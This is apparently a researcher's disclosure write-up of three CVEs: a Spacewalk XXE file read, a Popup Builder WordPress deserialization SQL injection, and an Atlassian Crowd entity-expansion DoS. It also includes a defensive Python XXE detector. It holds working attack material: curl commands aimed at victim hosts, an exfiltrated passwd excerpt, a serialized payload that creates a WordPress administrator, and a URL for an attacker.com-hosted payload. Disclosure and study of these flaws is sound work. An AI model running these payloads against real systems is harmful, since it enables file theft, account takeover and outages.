Proof of Concept exploit for CVE-2020-1693 – Spacewalk <= 2.9 XXE

CVE Description
A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.

Local file read

External DTD:

XML-RPC call for final exploit

curl -X POST -sik https://victim.tld/rpc/api -H 'Content-Type: application/xml' --data @xxe-ftp-exfil.xml

After sending the request with an FTP listener running, you will see the remote DTD fetch, followed by the exfiltration of the local file.

"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"

2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
USER: anonymous
PASS: Java1.8.0_151@
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection

CVE-2020-9006 – popup-builder WP Plugin SQL injection via PHP Deserialization

The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on WordPress instances.

Vulnerable code snippet:

The POST variable attachmentUrl is downloaded and passed directly into unserialize(), and the deserialized data is then used to insert rows into the database. By reversing that function we can write the following code to produce the serialized data needed to create a WordPress admin.

Which produces the following serialized data (before being base64 encoded):

a:2:{s:10:"customData";a:1:{s:5:"users";a:1:{i:0;a:7:{i:0;s:8:"zeroauth";i:1;s:34:"$P$B2R7.3rylqoX.YrEfQmcNEYVDheK1a/";i:2;s:8:"zeroauth";i:3;s:18:"[email protected]";i:4;s:20:"https://zeroauth.ltd";i:5;s:1:"0";i:6;s:9:"Zero Auth";}}}s:22:"customTablesColumsName";a:1:{s:5:"users";a:7:{i:0;a:1:{s:5:"Field";s:10:"user_login";}i:1;a:1:{s:5:"Field";s:9:"user_pass";}i:2;a:1:{s:5:"Field";s:13:"user_nicename";}i:4;a:1:{s:5:"Field";s:10:"user_email";}i:5;a:1:{s:5:"Field";s:8:"user_url";}i:6;a:1:{s:5:"Field";s:11:"user_status";}i:7;a:1:{s:5:"Field";s:12:"display_name";}}}}

This issue has been fixed in the 3.x branch of popup-builder. Versions 2.2.8 through 2.5.3 do not need a nonce, however 2.5.4 through 2.6.7.6 would need a valid nonce.

CVE-2019-20104 – Atlassian Crowd OpenID client vulnerable to Remote DoS via XML Entity Expansion

Atlassian Crowd is a single sign-on and user identity solution for the web. Crowd ships with a built-in OpenID client for testing OpenID integrations. By supplying that test client with a URL that hosts a malicious payload, an attacker can remotely DoS the Crowd instance through XML entity expansion, which consumes all available memory and crashes the application.

After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.

Proof of Concept XML XRDS payload:

Once the payload is hosted somewhere, invoking the following will make the Crowd instance fetch and process it:

curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'

Now, the server will expand entities until memory is consumed and produce output such as:

Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded
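Both the Spacewalk XXE above and the Crowd entity-expansion DoS come down to what an XML parser does with a DOCTYPE. As an added example that is not part of the original write-up, the following Python pre-parse guard tags the DOCTYPE features involved (external DTD, external entities, parameter entities, runaway expansion) so a body can be rejected before it reaches a real parser; the regexes, the expansion threshold and the sample bodies are constructed assumptions, not code from Spacewalk, Crowd or the author.

```python
import re

# Regexes are an assumption: fine for hand-written DOCTYPEs, not a full DTD parser.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+[^\[>]*(?:\[(?P<subset>.*?)\])?\s*>", re.S)
ENTITY_RE = re.compile(r'<!ENTITY\s+(?P<pe>%\s+)?(?P<name>\S+)\s+'
                       r'(?:(?P<ext>SYSTEM|PUBLIC)|(?P<q>["\'])(?P<val>.*?)(?P=q))', re.S)
REF_RE = re.compile(r"[&%]([^;\s<>]+);")   # &name; or %name; references

def expanded_size(name, entities, seen=()):
    """Characters an entity yields after recursive substitution (cycles count as 0)."""
    if name in seen or name not in entities:
        return 0
    value = entities[name]
    size = len(REF_RE.sub("", value))
    for ref in REF_RE.findall(value):
        size += expanded_size(ref, entities, seen + (name,))
    return size

def inspect_xml(body, max_expansion=10_000):
    """Sorted finding tags for the body's DOCTYPE; [] means there is nothing to reject."""
    m = DOCTYPE_RE.search(body)
    if not m:
        return []
    findings, entities = set(), {}
    head = m.group(0).split("[", 1)[0]           # <!DOCTYPE ... before any [internal subset]
    if re.search(r"\b(SYSTEM|PUBLIC)\b", head):   # <!DOCTYPE x SYSTEM "http://..."> fetches a DTD
        findings.add("external-dtd")
    for e in ENTITY_RE.finditer(m.group("subset") or ""):
        if e.group("ext"):                        # SYSTEM/PUBLIC entity: file read or remote fetch
            findings.add("external-entity")
        else:
            entities[e.group("name")] = e.group("val")
        if e.group("pe"):                         # % entities are how remote-DTD tricks are chained
            findings.add("parameter-entity")
    # Total size the document body would reach if every reference were expanded
    total = sum(expanded_size(r, entities) for r in REF_RE.findall(body[m.end():]))
    if total > max_expansion:
        findings.add("entity-expansion")
    return sorted(findings)

# Constructed samples, not captured from any real system
BENIGN = '<?xml version="1.0"?><methodCall><methodName>api.getVersion</methodName></methodCall>'
REMOTE_DTD = ('<?xml version="1.0"?>\n<!DOCTYPE methodCall [\n'
              ' <!ENTITY % remote SYSTEM "http://dtd-host.example/external.dtd">\n %remote;\n]>\n'
              '<methodCall><methodName>test</methodName><params><param><value>&send;</value></param></params></methodCall>')
_laughs = ['<?xml version="1.0"?>', "<!DOCTYPE lolz [", ' <!ENTITY lol "lol">']
for i in range(2, 6):                             # lol2..lol5, each ten copies of the previous one
    ref = "&lol;" if i == 2 else f"&lol{i - 1};"
    _laughs.append(f' <!ENTITY lol{i} "{ref * 10}">')
LAUGHS = "\n".join(_laughs) + "\n]>\n<lolz>&lol5;</lolz>"
```

Any non-empty result is a reason to drop the request and log it; the guard is a cheap front door, and the parser behind it still needs DTD loading and entity expansion switched off.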

Atlassian has responded to the issue via its Bug Bounty program on Bugcrowd.com/atlassian and has issued fixes.

The issue is fixed in the following Crowd versions:

  • 3.2.11
  • 3.3.8
  • 3.4.7
  • 3.5.2
  • 3.6.2
  • 3.7.1
  • 4.0.0

CVE and CWD references:

https://jira.atlassian.com/browse/CWD-5526

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20104

Happy Hunting 😊